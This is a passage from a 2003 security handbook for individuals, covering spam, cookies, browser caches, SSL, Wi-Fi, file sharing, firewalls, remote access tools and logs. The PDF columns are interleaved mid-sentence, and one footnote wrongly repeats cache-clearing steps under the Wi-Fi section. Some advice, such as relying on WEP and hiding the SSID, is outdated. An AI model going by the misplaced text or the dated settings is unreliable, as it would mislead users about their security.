correct. This is known as a Rumplestiltskin attack. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 55 SPAM · Use an e-mail address that is a common given name, or an initial plus a common surname Spam is the name we use for unwanted e-mail, and in · Put your e-mail address on a web page, or, in fact, particular, unsolicited commercial e-mail sent out in allow your e-mail address to appear in print anywhere massive numbers with no specific reason to believe that · Register a domain name or be listed as the the recipient will be interested in the product. In recent technical contact for a web site years, the amount of spam has grown dramatically. · Use a "guessable" e-mail address In 2003, it is estimated that over 50% of all e-mail · Have your e-mail address on any system that has transported over the Internet is spam! Many people been maliciously penetrated previously currently receive over ten spam e-mails for every valid one. If any of these apply to you (and you will not necessarily P have control or even knowledge about previously ART It would be nice if all spam would contain something penetrated systems), there is a good chance that your like "**SPAM**" in subject line, so that we could delete address was harvested and sold to spammers. If you use it easily. In fact, laws being passed in some jurisdic- the Internet to any extent, you are likely to be on some TW tions mandate that any unsolicited commercial e-mail spammer's list of recipients. sent from within their territory contain just such a warning. However, this type of legislation is not b) Some commercial spam is obvious and by nature of O practical at the present time, for reasons of volume, its volume and irrelevance, virtually everyone will extraterritorial spam, and enforceability. One must agree that it is spam. For other mailings, the have a reasonable way of recognizing and eliminating distinctions are less clear. In some cases, spam without reading each message or notifying a it depends on the recipient whether a particular potentially overburdened complaint system. e-mail is considered spam, rather than on the actual mailing. Several examples will help illustrate Understanding Spam the point. · Is an e-mail considered spam if it contains To understand the problems associated with spam, information on how to change the size of certain one must look at three issues: a) how do the sexual body parts? Answer: Yes. Unless you are a spammers get your address, b) how should spam plastic surgeon or a urologist and the e-mail was be defined (in detail), and c) why do the spammers an academic paper, not a commercial advertisement. send these messages at all? · A Call-for-Papers requesting people to submit a) If you engage in any of the following activities, there papers for an academic conference on some is a good chance that a spammer will obtain your obscure topic is sent to many mailing lists. address: Is this spam? Answer: Perhaps. Unless by some · Send mail or subscribe to a semi-public mailing list coincidence the subject was of interest to you · Reply to a spam message saying that you should and you will submit a paper. be removed from their mailing list · A company that sold you a product sends you · Post messages to a Newsgroup information about a follow-on product at your · Register for something on the web, giving your request, along with a million e-mails to other e-mail address (when you are not absolutely sure customers who asked to be notified. Is this spam? it is a reputable organization) Answer: No, but any spam filtering programs at · Use a computer that has an Ident daemon running your ISP may have a hard time understanding (on many Unix systems, an Ident daemon will tell this, as it looks like spam. anyone who asks what your username is). · An e-mail contains content that is spam by any · Let your web-browser know your address definition. Is it spam? Answer: Yes, when it was · Use IRC, instant messaging, or chat originally sent. But if it was then forwarded · Play games over the Internet to this author by a trusted colleague as an interesting example to include in this book, it is not spam and should not be filtered. 56 INFORMATION SECURITY AND GOVERNMENT POLICIES c) Why do spammers send spam? The simple answer is some spam through and thus is not because it works. If you look at spam, you quickly see a 100% effective. pattern. Most spam is about: False positives A false positive means that the scanning program decides that · Making or saving money some innocent mail is spam. · Improving your love-life or sex life This can be very dangerous, · Improving your health particularly if the mail is discarded instead of being delivered. These topics have one very important thing in common. False positives may mean that good Most of us care about these issues to some extent and mail is lost and unrecoverable many of us are deeply concerned about them. So even through electronic means. though a very small percentage of recipients respond to spam messages related to these topics (estimated at The target in spam scanning programs is to minimize about 1 purchase for every 100,000 e-mails sent), spam- false negatives and to have no false positives. mers who send out many millions of messages per day Unfortunately, reducing false negatives usually increases might make a lot of money. false positives. People who, for whatever reason, need to receive mail that looks like spam can be hurt, in par- What can you do about spam? ticular. A recent case involved an academic electronic newsletter that discussed spam. Since the newsletter There are many ways that one can attempt to control included examples of spam, it was viewed as spam by and limit spam. Some governments are enacting legislation some spam scanners, and was deleted by several ISPs. prohibiting spam mailings from within their jurisdiction. Most ISPs say that using their facilities to send spam is In addition to spam scanners, there are also spam-filtering a violation of their usage agreement. Rules such as techniques which involve the sender in the process. One these can be effective, but to date, most spam-related spam filtering technique is a challenge-response process. rules have proven difficult and costly to enforce. When mail is received from an unknown sender, it is inter- cepted before the recipient can see it. A challenge is sent to Some large (e.g. corporate) users of e-mail refuse to the sender requesting a confirmation that the mail was sent accept mail from ISPs that are known to allow spammers by an individual and not a program. The form of the confir- to operate. This can be effective, because it may force mation is such that a human must reply; it cannot be han- the ISP to clamp down on spamming activities. However, dled automatically, at least not in a manner that is effective more often this method simply hurts the enterprises' for the would-be spammer. If no confirmation is received innocent customers who can no longer send e-mail to after a few days, the mail is discarded. There are provisions some locations. There are a number of programs that try for accepting mail from known mailing lists and other to recognize spam and either delete it or warn the desired automatic mailings. The problem with this technique recipient that the mail looks like spam. These programs is that it requires manual intervention by the sender. If you can be run at an ISP's site or in your own mail client. send mail and then are unable to quickly respond to the The programs will look at the content of e-mail and/or confirmation request, your mail will not be delivered. If two its point of origin. These criteria are difficult to evaluate, people both use this type of service, it is possible that they and such programs often will generate false negatives or would never get any mail from each other, because the first false positives. receiver will not see the mail unless it is confirmed and the request-for-confirmation will not be passed on because it's False negatives A false negative is produced when sender is also unknown. Some spam-filters put suspected the scanning program decides that spam into a low priority folder, rather than deleting the an e-mail is not spam, but it messages. Then you may periodically review the spam folder really is. This means that it lets to make sure that it doesn't contain any false positives. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 57 A promising new anti-spam technique is Bayesian technically appropriate modules or perform complicated Filtering. In this method, the filter's rules improve multi-step procedures. by learning what you consider spam; these rules can be changed by each recipient. These rules tend to learn Unfortunately, dynamically downloaded programs can also who your trusted colleagues are and, at your request, be malicious. All browsers allow you to control whether will allow content that would normally be spam, but you can download and run JavaScript, Java, ActiveX and is of interest to you for some reason. Bayesian filters other programming tools on your machine. If you want to also employ linguistic techniques to allow mail contain- be completely safe, then you will not allow these tools to ing certain words that rarely appear in spam, but do run. Of course, by disabling these features, you will find appear in your real e-mail, based on prior experience that many web sites cannot function without them. with your e-mail habits. Bayesian filters are being made P available for many e-mail programs. Instead of blocking your access to so many sites, ART you may wish to follow a reasonable intermediate path: If spam is a problem for you, you should see if your ISP offers any spam identification or filtering capabilities. · Enable the relatively safe and very commonly used You should also look into software programs that can capabilities such as Javascript. This will allow the vast TW filter out spam as it arrives at your computer.30 majority of web sites to function properly. · Either disable the less common and much less safe O Using the World Wide Web capabilities such as Java and ActiveX, or set the browser to ask your permission prior to using the As this is written in 2003, the web has been available capability. Disabling these capabilities means that the in varying degrees for about ten years. For those who functions will not work; some sites may warn you about use it regularly for work, school, and recreation, it has this, others will simply not work properly or will hang. become indispensable. Since the web has become such a If you request prompting, however, the browser should common and useful tool, there is a tendency to detect the requirements of the site and will ask for your forget that it can also be a hostile place. permission to download and run a program needed to view that site's content. Safe Browsing Rule 12: Display the web site address you are In general, the web is relatively safe, but there are visiting and the address you are linking to, potential dangers. Web sites usually house content, and pay attention to them while visiting an including static text and images, but they can also unfamiliar web site, especially if you are house dynamic programs that are intended to run allowing the site to execute programs on on your computer. our computer. Rule 11: Do not allow web sites to download and Web browsers can be configured to show what web site execute potentially malicious programs on your is being visited (often called the Navigation or Address computer unless you know that the site is Toolbar). When your cursor is pointing to a link, they trustworthy. will also display where that link will take you (Status Bar). Watching these will tell you when you are being Dynamically downloading programs can be very useful. transferred to another site, perhaps one you do not want This capability allows you to use online services, includ- to visit, or perhaps one that is not trustworthy. On a ing those needed to check your computer for viruses and practical level, you are probably not going to look at the security problems. It also enables software to be installed Navigation Bar and the Status Bar every time you click, and updated easily, without requiring the user to select but when you are at an unfamiliar site, particularly if 30 See Annexes 2-4 for web sites and other resources on anti-spam software and techniques to avoid spam. 58 INFORMATION SECURITY AND GOVERNMENT POLICIES you have enabled Java or ActiveX, you can use these have the browser ask for your permission before storing tools so that you know that you are being redirected a cookie. You are never informed when a cookie is to a new site without your permission. sent back to a web site. Cookies Cookies can be viewed, since they are in text format, but typically the information has been encoded or A cookie is information written to your hard disk by encrypted by the web site so it is not intelligible. your browser at the request of a remote web site. Some browsers allow you to display and delete When you visit the site later, the cookies owned by cookies, and there are third-party programs that that site are sent back. Cookies are typically sent allow you to manage cookies. back to the originating web site only, although there have been browser bugs that allowed other sites to If you wish to control what web sites know about you, see them as well. A cookie reminds the web site who you should control how and when cookies are being you are, what your preferences are, and what you have stored on your computer. Note that some sites require done before on this site. For instance, when you log that cookies be stored to allow the site to function onto a site with your username and password, the site at all. Generally these sites will tell you if they find can store this information in a cookie on your computer. cookies disabled. When you return a week later, it can automatically log you onto the site based on the information in the cookie. If you use web browsers from public locations Cookies may also allow a web site to track what you are (Internet cafés, libraries, schools), note that cookies doing in a single session. containing information about you are still being stored on that computer. In many cases, the computer owner Although a cookie normally can only be retrieved by may not allow you to control, view, or erase these the originating web site, it is important to understand cookies. So information about you may be left on that the web site that you are visiting may contain these computers and used when someone else visits images and other objects from a second web site the same site. If you logged onto a site and your (called a foreign or third-party site). That foreign web site authentication information is remembered in a cookie, can also store and retrieve cookies. Since images can be another user going to that site may automatically be transparent, you may not even know that this is happen- logged on as you! That web site may then give that ing. Such invisible images may be used for advertising user stored information about you (such as your name, purposes,31 tracking what web sites you visit. address, credit card information, etc.). Rule 13: Consider controlling under what situation Even with a private computer used by several people, you allow cookies to be stored on your computer. this can be an issue. In these cases, cookies are not If you cannot control them (such as when using a only a privacy issue, but also a security issue. computer in a public location), consider not entering private information. Web Browser Caches All web browsers give you a certain degree of control When a browser retrieves a page or an image from a over whether cookies are allowed or not. In some web site, the browser displays the site and usually cases, the browser may differentiate between cookies stores a copy of that page on your hard disk. This set that stay on your computer, cookies that disappear of stored pages and images is called a cache. If you when you close your browser, and those that are stored visit that site later and the page has not changed, the by the web site you are visiting and foreign web sites. browser may not download the full page from scratch, Typically, you can allow all cookies, disallow them, or but instead will use the one in the cache. In some 31Consider what happens if web sites A, B, C and D all include an invisible image from web site Z. When the invisible image from Z is displayed, Z is told which site pointed to them (A, B, C or D), and Z retrieves and restores a cookie remembering what web sites you have been to. Z now has a good idea of what types of things interest you, and can arrange for targeted advertising to be sent to you. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 59 cases, web pages that are in a cache can also be to read. (See Addendum 1 for details). The name of the viewed offline, when you are no longer connected to encryption capability is SSL for Secure Socket Layer. You the Internet. This means that anything that you dis- can tell if SSL is being used for messages sent to you play with a browser may be stored on the computer's because there is (for most browsers) a picture of a small hard disk as well. So if you use the web for financial padlock on the screen that is open for normal transmis- transactions, information about your purchases, credit sions, and closed (locked) for SSL transmissions. Also, cards, and bank accounts may be stored on that com- the URL will start with "https" instead of "http". You puter in fully readable text. Depending on how much should always use the strongest encryption possible ­ browsing is done on the machine and the size of the 128 bit is best if it is available in your country. cache that is configured, these pages and images can stay on the computer for a very long time. Note that this padlock does not tell you that your mes- P sage going back to the server is using SSL, but it is nor- ART Rule 14: If there is any sort of private mally assumed that if the screen you received is information displayed on a web page, encrypted, the web site will ensure that your return clear the cache after the session is over. message is also encrypted. If you cannot clear the cache (such as TW when using a computer in a public location), SSL can only work if your browser knows who it is you may decide not to use this particular talking to. This is accomplished by means of "security O computer for the task. certificates" and "digital signatures". In general, if a web server wants to be trusted, they must obtain All browsers allow you to clear the cache (called a security certificate from some recognized authority. Temporary Internet Files by Internet Explorer), If the authority is doing their job properly, they verify but some public machines, such as those at Internet that whoever is requesting the certificate really is who cafés, do not allow you to access the control windows they say they are. This authority then signs the certifi- that clear the cache. Although clearing the cache cate digitally and your browser has built-in tables to after entering sensitive information is very important, no recognize these authorities. browser so far has put an icon on its main toolbar to allow this to be done with one click.32 Occasionally, you will get a message that a web site has sent you a certificate that: Secure Transmission · has expired, or Normally when you are using the web, all the messages · is someone else's certificate that you send and receive are in clear text. That is, if someone were to intercept them and print them, they In the former case, it is usually the case that the certifi- would be readable and understandable. There are times cate has just recently expired, and the site needs to get when this is undesirable. Interception is of particularly their paperwork in order. In the latter case, it is usually concern if any part of your Internet connection goes the case that the site has been recently renamed and that over wireless services or if the ISP at either end of the is not reflected in the certificate. However, in both cases, connection is untrustworthy. you may want to play it safe and terminate the connec- tion until the problem is rectified. To address this, browsers and web servers support encryption. Encryption changes the messages so that they are difficult or impossible for unauthorized people 32For Internet Explorer on Windows, Select Internet Options on the Tools pull-down menu. On the General tab, under Temporary Internet Files, hit the Delete Files button. For Internet Explorer on a Macintosh, Select Preferences on the Explorer or Edit menu, go to Web Browser and then Advanced, and in the box marked Cache, hit the Empty Now button. For Netscape/Mozilla, Select Preferences on the Edit pull-down menu. Expand the Advanced entry and select Cache. Hit Clear Disk Cache. For Safari on a Macintosh, Select Empty Cache from the Safari menu, and hit Empty to confirm. 60 INFORMATION SECURITY AND GOVERNMENT POLICIES Is secure transmission sufficient? various levels of encryption. (See Addendum 1 for details on encryption techniques). If the server you The little locked padlock is designed to tell you that the are communicating with supports encryption, it should web transmission is secure, and it accurately reflects that. be used (secure SSL web sites, for example). If you use However, transmission is not the only issue to consider. POP e-mail, you should select the "APOP" option that Only a very small percentage of cases of fraud or identity will encrypt your password before sending it, instead theft occur due to insecure transmissions. The vast majority of sending it in clear-text. This will give you end-to-end of cases are due to: security regardless of the transmission medium. If the server does not offer encryption, you should be aware · unscrupulous web sites, of the technology limitations and adjust how you use · the web site has been compromised, or the connection, if necessary. · your computer has been compromised. 802.11 "Wi-Fi" The one major exception to this is for wireless transmissions, which will be covered next. 802.11 is a set of developing IEEE standards for wireless local area networks (WLAN).33 802.11, Privacy Policies (often called "Wi-Fi" ­ short for Wireless Fidelity) Many web sites publish a Privacy Policy. A privacy is becoming popular as an alternative to wired Ethernet policy should describe what kind of information the for connecting computers and laptops. On the positive site collects, what they will and will not do with that side, it is inexpensive and relatively fast. data, and how they protect the data. All web sites Unfortunately, there are several vulnerabilities that collect personal or financial data should have a suit- in most implementations: able privacy policy. · Typical base stations are shipped with no security Wireless Transmission enabled. · Unless you want to share your network connection Wireless technology of various sorts is increasingly being with someone in the neighborhood, you should used in developed countries and in developing countries. change the network name (SSID) from the default one It is often less expensive than wired technologies, easier and set the configuration not to transmit it. If you and faster to install, particularly in less populated areas, do this, only those people who already know the SSID and subject, at least at the moment, to less regulatory will be allowed on. oversight. However, wireless technologies have two poten- · The encryption mechanism (WEP) is weak and can tial problems: easily be broken. Nevertheless, in the absence of a better mechanism, you should enable it. · It may be possible to intercept transmissions, and Remember that it is vulnerable to attack if · Transmission quality may vary with location, weather, anyone really wants to look at your transmissions, time of day, nearby radio equipment, transmission including passwords. speed, quality of the installation, and malicious · A new encryption mechanism, WPA, resolves the problems interference. in WEP and it is available in newer equipment. It is There is little that can be done about the second group strongly recommended for all Wi-Fi installations. of problems. They are characteristic of wireless technology and may be seen as the price that is paid for connectivity without wires. Interception can be addressed through 33For Internet Explorer on Windows, Select Internet Options on the Tools pull-down menu. On the General tab, under Temporary Internet Files, hit the Delete Files button. For Internet Explorer on a Macintosh, Select Preferences on the Explorer or Edit menu, go to Web Browser and then Advanced, and in the box marked Cache, hit the Empty Now button. For Netscape/Mozilla, Select Preferences on the Edit pull-down menu. Expand the Advanced entry and select Cache. Hit Clear Disk Cache. For Safari on a Macintosh, Select Empty Cache from the Safari menu, and hit Empty to confirm. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 61 Mobile Telephones The obvious vulnerability is that if you can access your files remotely, someone else can do so as well. A less Mobile telephones (often called cellular or hand-phones) obvious vulnerability is that if you share files with another are widely used for voice transmissions. At times, they user, you become vulnerable to security problems that are also used for data. Many mobile telephone technolo- may be present on their computer ­ if they become gies allow eavesdropping and are not secure. infected with a virus and have write-access to your files, you may now be infected. If you read an infected file Long-haul Lines from their disk, you may now be infected. Long links, particularly to remote areas, are often built Rule 15: If you are not using file sharing, using wireless technologies. Typically the link will serve disable it. If you are using it, to the extent P many users simultaneously. If the transmission method possible, limit the kinds of things that can ART is highly directional (using dish or yagi antennas), it is be done to those functions that you need. relatively difficult to intercept transmissions without specialized equipment. These links may be encrypted Rule 16: If you use file sharing, set robust with the addition of hardware encryption devices if usernames and passwords and limit the access TW necessary. permissions to the least possible that will allow you to do your work. O Local Loop Wireless Telephones Rule 17: If you share files with another user, Wireless local loops to homes and businesses are used in make sure that they take security seriously. many countries, as they allow telephones to be installed without the cost and trouble of building wired infrastruc- Virtually all file sharing and remote file access capabilities ture, and because wireless equipment is not as easy to allow you to set up usernames and passwords to control steal and resell as is copper wire. As with a wired tele- access. Generally, they also allow you to control what a phone, when a modem is connected to these lines, it user can do (read-only, write, create, erase). Many systems becomes a data link. The wireless technology used may be allow you to control what any user can do. For example, interceptable. Depending on your location, your countries you could restrict the entire remote access facility so that regulations, and local practices, you may want to check it only allows read-access; if you do not need write with your service provider to see if the link is encrypted, access, disable it if you can. and thus protected, at least to a certain extent. Typically, systems that support some form of file Other Internet Issues sharing also support the sharing of printers. Although giving someone remote access to your File Sharing printer is typically not hazardous, it is better to restrict such services unless they are needed. It is File sharing is one of the most useful networking tools if possible that a bug will be detected that allows you have more than one computer. In the simplest situa- malicious actions though an access that should tion, it lets you access, change, create, or delete files on have been used for printing only. one system while working on another system. The two systems could be in the same room or they could be half Instant messaging a world apart. Among other things, file sharing allows you to copy files to and from a laptop prior to traveling Instant messaging is a facility that allows a message or while you are away on a trip. At the other extreme, a typed on one computer to be displayed on one or more single computer acting as a file server can take the place other computers virtually instantaneously. Unlike e-mail, of the hard disk for a large number of computers. In this both sender and recipient must be online at the time. case, most or all of your files reside on the file server and Instant messaging goes under many names on various you access them over the network. systems. Among them are: Chat, ICQ (an acronym-like 62 INFORMATION SECURITY AND GOVERNMENT POLICIES homonym for "I Seek You"), IRC (Internet Relay Chat), it is up to the user to turn them off. Often the user is Talk, AIM (AOL Instant Messenger), and Messenger. not even aware that the services are there. For many Internet communities such as AOL, MSN, Yahoo, years, some Unix systems were designed so that every game-playing hosts, and many others all have their installed user machine could act as an unrestricted mail own Messenger and Chat variants. Some of these hub if they did not explicitly turn the capability off. interoperate with others, and some do not. This allowed spammers to use these machines to send spam, without the machine owner's knowledge. Many messaging systems allow you to select a name that will be displayed with your messages and that allows Rule 19: Disable all Internet services that are other participants to send messages to you. They often not needed and used regularly. allow your real identity to be disguised, although the system administrators can identify who you are, at least Increasingly, suppliers are becoming aware of the problem. by your IP address. So, despite their pride at developing feature-rich systems, they are shipping their programs with extraneous services Rule 18: Instant messaging can be very helpful, disabled; the user may enable them, if they are needed. but use it with care and knowledge. In either case, it is important for users to make sure that unused services are not enabled. Such services Instant messaging plays a very useful role for include file and print sharing, web servers, mail servers, several reasons: file transfer protocol (FTP) servers, Remote Procedure Call (RPC) servers, and others. · it is much faster and easier to use than mail and has almost no delay ­ this makes interactive conversations much more practical than e-mail, · messages can usually be sent and received in a small window on your screen while you are doing other work, and · you do not have to reveal your e-mail address (and identity) to other participants. For certain types of uses, messaging is far preferable to e-mail. In some people's minds, it is also more secure, as the messages are not copied to disk at various places, as is the case for regular e-mail. However, users are cautioned that messaging is still not particularly secure. The major problem with messaging systems is that some of them have been expanded to allow file transfer. This makes them vulnerable to the same problems as other types of file sharing, including e-mail attachments. Some messaging systems also allow remote execution of com- mands, potentially allowing attacks on your computer. Improperly Enabled Services Operating systems and applications have become very powerful and functional. In most cases, a typical user does not need or want all of the capabilities that their software offers. Services that are not needed should be turned off (disabled). Unfortunately, some software sup- pliers ship their software with all services enabled and Information Technology Security Handbook SECURITY FOR INDIVIDUALS 63 CHAPTER 7. · If a virus, worm or Trojan is detected, the program TOOLS TO ENHANCE SECURITY will either remove it (disinfect) or it will tell you that the problem cannot be fixed and will "hide" the At a Glance bad file so that it cannot cause any damage. A virus checker with up-to-date virus signatures In this chapter, software tools and techniques to (a signature is the specific characteristic of each virus enhance computer and network security are investigated. that is recognized by the checker) is an essential part These software packages include virus checkers, firewalls of any computer, whether it is Internet-connected or and remote access tools. not. Note that there are few known Unix viruses at the Virus software time this is being written but Unix worms and Trojans P certainly do exist. ART Rule 20: Every computer that is vulnerable to As of the end of August 2003, one of the popular viruses should run anti-virus software and should PC/Macintosh virus programs (Norton AntiVirus") check for up-to-date virus signatures daily. checked for almost 65,000 different viruses. That these TW A full scan of the machine should be performed programs can do this as fast as they do, without per- periodically as well. ceptibly slowing down your computer, is quite amazing. O August 2003 was a particularly interesting month for Rule 21: Computers that are not particularly malware, with the release of several worms (Blaster and subject to viruses such as Unix-based systems SOBIG being the most common ones) that took advan- should nevertheless ensure that the mail that tage of a vulnerability in Windows computers. A month they send out does not contain a virus that may earlier, Microsoft had released a patch for this vulnera- harm the recipient. bility, but relatively few people installed this patch, and so these new worms hit new records for the number of Rule 22: Keep your operating system and key machines infected and the speed at which they spread. application software up-to-date and remember They may have also set new records for the number of that virus checkers only check for infestations "copy-cats" ­ the same basic worm, but with various in files. Vulnerabilities in operating systems and modifications. On the busiest day, Norton added fifty- applications programs can leave you open to attack one new virus signatures (defining characteristics of in other ways. those viruses) to their list. For the whole month, 520 new signatures were added. Virus checking software attempts to keep your computer free of viruses, worms, and Trojans in a number of ways: Firewalls · Whenever you access, copy, save, move, open, A firewall watches all network activity going into or or close a file, the virus checker makes sure that coming out of your computer. Based on a set of rules, it it is not infected with any known virus (and other can allow the traffic to pass or it can block it. A firewall similar pests). can be either a program running on your computer or a · Whenever you insert a foreign disk in your machine, separate piece of equipment between your computer (or it is checked for certain types of viruses. a cluster of computers) and its network connection. · Whenever a mail file is received, it (and attachments) Sometimes firewalls are included in other equipment is scanned for malware. such as routers. There are free or pre-installed firewalls · Whenever a file is downloaded from the web, available for many operating systems. it is scanned. · In many cases, when a web page with embedded Rule 23: All computers should be protected by a software is downloaded, it is scanned. firewall of some sort, either software within the · You can explicitly request that any file, set of files, computer, or an external firewall protecting that or entire disks be checked for viruses. computer or an entire local network of computers. 64 INFORMATION SECURITY AND GOVERNMENT POLICIES To fully understand what a firewall does, and how though they will all be ignored, they can keep your to set up the rules that govern it, you need an network connection so busy that you cannot do any introductory understanding of TCP/IP ­ the protocol real work (only hardware firewalls will help you in (set of rules) governing all messages sent over the this case). Internet. If you are already familiar with the TCP/IP · If, despite your best efforts, you do end up with protocol, you should go directly to the next section. a virus, worm or Trojan on your computer, it can If you are not already familiar with TCP/IP, you should send anything on your computer to the malware first read Addendum 2. TCP/IP. Note that a firewall creator. This could include any of your data or logs can be used even if you do not want to learn these of what you are typing (including passwords). technical details. In that case, here is all you need to know about TCP/IP: How do firewalls work? · Machines on the Internet all have an " IP address" A firewall watches every packet that is received by to that has the form 12.222.103.43, that is, four sent from your computer, and verifies whether it vio- numbers separated by periods. The Internet uses your lates any of the rules that you have set for it. If a address to route messages to you, and your computer packet violates the rules, it is blocked (discarded). For says where to send out-going messages by providing both software firewalls and external (hardware) fire- the address of the destination. walls, the rules might include: · Within each machine, different programs are identified by the "port" number (sort of like a · Do not allow any packets to TCP/UDP ports 135, 137, telephone extension number within a large company ­ 139, 445. These ports are used for Windows file there is just one telephone number, but each person sharing and a selection of other Windows services. has their own extension number). By discarding these packets, you are ensuring that · Information sent to or from your computer is no one on the Internet can contact your computer enclosed in "envelopes" call packets. for these services. · Ignore the words TCP and UDP in the following · Do not allow any packets to TCP/UDP ports 135, 137, discussion. 139, 445 unless they come from IP address 192.168.1.150 (where 192.168.1.150 is that address Why do we need firewalls? of your second computer that is allowed to share your resources). If your computer is not connected to a local network or · You can give the firewall a list of trusted computers ­ to the Internet, you do not need a firewall. Once you those that you know are not trying to hurt you. use the network, you are subject to all sorts of abuse. Only trusted computers will be able to initiate For example: communications with you. You can still communica- tion with other computers, such as web servers · If you use file sharing, print-sharing or any other on the Internet, but you must initiate the inter-computer services, your computer is probably communication. listening on certain ports. Although you may be doing this so that the computer in the next room Software firewalls consume resources on your computer, can share your resources, it is possible that a but have the added advantage that they not only look computer anywhere else in the world could as well. at the datagram (with its to/from address and ports), but · If you are listening on a port for (for instance) they can check which program is sending the message. If file sharing, it is possible that due to bugs in the it sees a program initiating a communication that you had program, someone could send you a message that not explicitly allowed, the firewall can ask you for your would take some other action ­ perhaps malicious. permission before allowing it to go through. A hardware Unfortunately, such bugs are quite common. firewall cannot determine which program is bring used, · Even if you are not listening on any port, computers but since it is a separate piece of equipment, it does not elsewhere can send you floods of messages. Even slow your computer down at all. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 65 Like all security-related precautions, if you have a firewall, whether hardware or software, you must keep the software Proxy servers A proxy server is a specific type of and firmware up to date. Attackers are very innovative firewall. The proxy server has an and it is essential that the tools that you are using to address in the private address space, protect your system and data are current. but also has a second connection and address connected to the Private Address Spaces and Network Address Internet. If a user wants to Translation (NAT) (and is allowed to) communicate with a machine in the Internet, As the Internet was originally designed, every computer it sends the message to the proxy or device on the Internet had its own address, so there server, and requests that this P was the ubiquitous ability of every computer to talk message be forwarded to the target ART to every other computer. Today, there are cases where machine in the Internet. The proxy universal connectivity is no longer appropriate. There server keeps track of this request, are two primary reasons: and when the answer comes back, it returns the answer to the TW · You want to isolate a set of computers so that they originating machine. cannot directly talk to the rest of the Internet ­ O and the Internet cannot talk directly to them. Proxy servers can also be used if you This is the case with computers within some have a normal IP address. They are organizations, both public and private. used to control what type of traffic · Because of the way that IP addresses are allocated goes out onto the Internet, or to within the Internet, your organization does not have simplify a user's interaction with the enough IP addresses to assign unique addresses to network. A web proxy server will every machine. This is often the case with developing keep copies of pages requested, and countries where national Internets were built (or are if a second user requests the same being built) several years after comparable networks page, it simply provides the copy ­ in developed countries. limiting the number of requests sent to the Internet and therefore There are certain IP addresses that are not usable over reducing external bandwidth the Internet. These are called Private Address Spaces and requirements. Keeping recently can be used in the above two cases. Since these com- requested pages is called caching. puters will not directly interact with the rest of the Internet, they do not need unique addresses. Although Network Address Network Address Translation (NAT) is several organizations may be using this same set of Translation normally implemented by having a addresses, neither of them can see the other and there special box sit between the local is no problem. In the first case in the bullet point network and the Internet. Like the above, even though you do not want to allow most con- proxy server, it is connected to both tacts between the internal machines and the Internet, the local network where private IP there will be some interactions that are desirable and addresses are used, and to the necessary. In the second case, there is no prohibition Internet. When a message from the on such access. local network bound for the Internet is received by the NAT box, the NAT There are two mechanisms that allow a computer with a box sends the message out to the private address to communicate over the Internet. Internet using its IP address, and says it is coming from an port number that is unused. When the reply comes in, it is returned to the 66 INFORMATION SECURITY AND GOVERNMENT POLICIES originating computer on the local Malware detectors network. A NAT box is similar to a proxy server, but it works for all It would be nice to assume that if you practice keep kinds of traffic, not only a specific all of your software up-to-date, check incoming files kind (such as web traffic) and it for viruses and worms, use secure usernames and does not do any caching. passwords, and protect yourself with a robust firewall, then you will be completely safe. To phrase this as Both proxy servers and NAT boxes are effectively a question, if you practice safe computing, will you firewalls and implicitly protect the machines within be safe? the local private address spaces from many of the types of attacks that machines with normal IP address are The answer is "probably". There is always the chance subject to. that some sort of problem will hit you before a solution is generally available. It is also possible that occasion- Remote access/management/ ally you may do something that is less than 100% safe. administration tools Malware detectors are programs that check your Remote access, remote management and remote computer to see if there is anything there that administration tools allow you to control your computer looks suspicious, regardless of how it got there. remotely, either via a dial-up telephone line or via the Their functions overlap with virus checkers in some Internet. When you are connected to your computer in cases, as they will both detect the presence of some this way, it is equivalent to sitting at the keyboard. types of malware on your disk. Depending on the specific tool, they will check to verify that key Rule 24: If you use remote access facilities to system programs have not been surreptitiously remotely control any computers, make sure that changed. they have robust security (at the very least, excellent usernames and passwords) to ensure Malware detectors will also look at browser plug-ins that attackers do not use these same tools. and add-ons and try to detect those that are potentially malicious or will violate your privacy. Some malware Remote access tools have many important uses. detectors also include tools to remove an offending Among them are: program. · They allow you to use your office computer while not Logs at the office. This allows you to use data, applications programs, and network services that are accessible Logs are an under-utilized and under-appreciated tool in at work. ensuring that you computer is secure. A log is a file on · They allow you turn over control of your machine to disk into which programs can write messages. Typically a specialist to diagnose or fix a problem without the a message is written into a log when something inter- specialist having to come to your location. esting happens or if some error occurs. · They allow multiple people to use an application Rule 25: System functions and applications logs program that is only installed on one machine. should be judiciously enabled. · They allow systems support personnel to manage multiple servers easily. Examples of "interesting" things include: Remote access tools also allow an attacker to do all of · the computer is powered on; the same things. In fact, there is often little functional · someone logged onto the computer; difference between a remote access tool that is sold for · someone tried to log onto the computer, but had a the above type of applications (such as pcAnywhere), and wrong password; the backdoor Trojan (such as NetBus or Back Orifice). · an e-mail was received; Information Technology Security Handbook SECURITY FOR INDIVIDUALS 67 · an e-mail send was attempted, but the connection failed; · there were many errors on a disk, or on a network connection; · the firewall detected an illegal communication and blocked it; · the virus checker automatically downloaded a new set of virus signatures; · a virus scan of all files on your system was run and a virus was detected. P Depending on the program/system, log files can just ART grow until they are erased, or there may be a new log file created every so often, with the old log files being kept for later review (typically they will have a date in the filename) TW In general, there is a separate log file for each application O or system function. Sometimes you read a log with any text editor, and sometimes the application or system provides specialized tools to read and format logs. Logs are very useful and should generally be enabled. However, you need to take care to ensure that you do not enable logging for functions that happen too often, or your system will spend all of its time writing logs and your disk will become clogged with log files. If you understand what the detailed log entries are saying, you should review them periodically to see if anything unusual is happening. Otherwise, logs should be kept so that in the case of some sort of unusual happening, they may give some hint as to exactly what happened. 68 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 8. How to protect yourself PLATFORM SPECIFIC ISSUES Virtually all of the rules in this manual apply to Microsoft Windows-based PCs? Windows systems and security-conscious users should consider each of the recommendations seriously. Strengths and vulnerabilities Software If you have adequate bandwidth, use currency Microsoft's Windows's Update site to keep The Windows operating system for the Intel x86 your operating system up-to-date. (or equivalent) processor is by far the most popular If reasonable bandwidth is not available, computer system ever built. The capabilities of the consider using Windows Update for critical operating system and related applications, from an end- security patches (they use far less user's perspective, are remarkable. There is a vast amount bandwidth than the larger Service Packs). of commercial, shareware, and free software available If Windows Update is not practical, for it. Although experts are hard to find (as with most updates can be downloaded from systems), there are many people who have reasonable Microsoft's Download Center: levels of knowledge about these systems. There are many (http://www.microsoft.com/downloads). competitors on the hardware side, resulting in much variety and relatively low prices. Perhaps your ISP or some other service provider could download them and From a security point 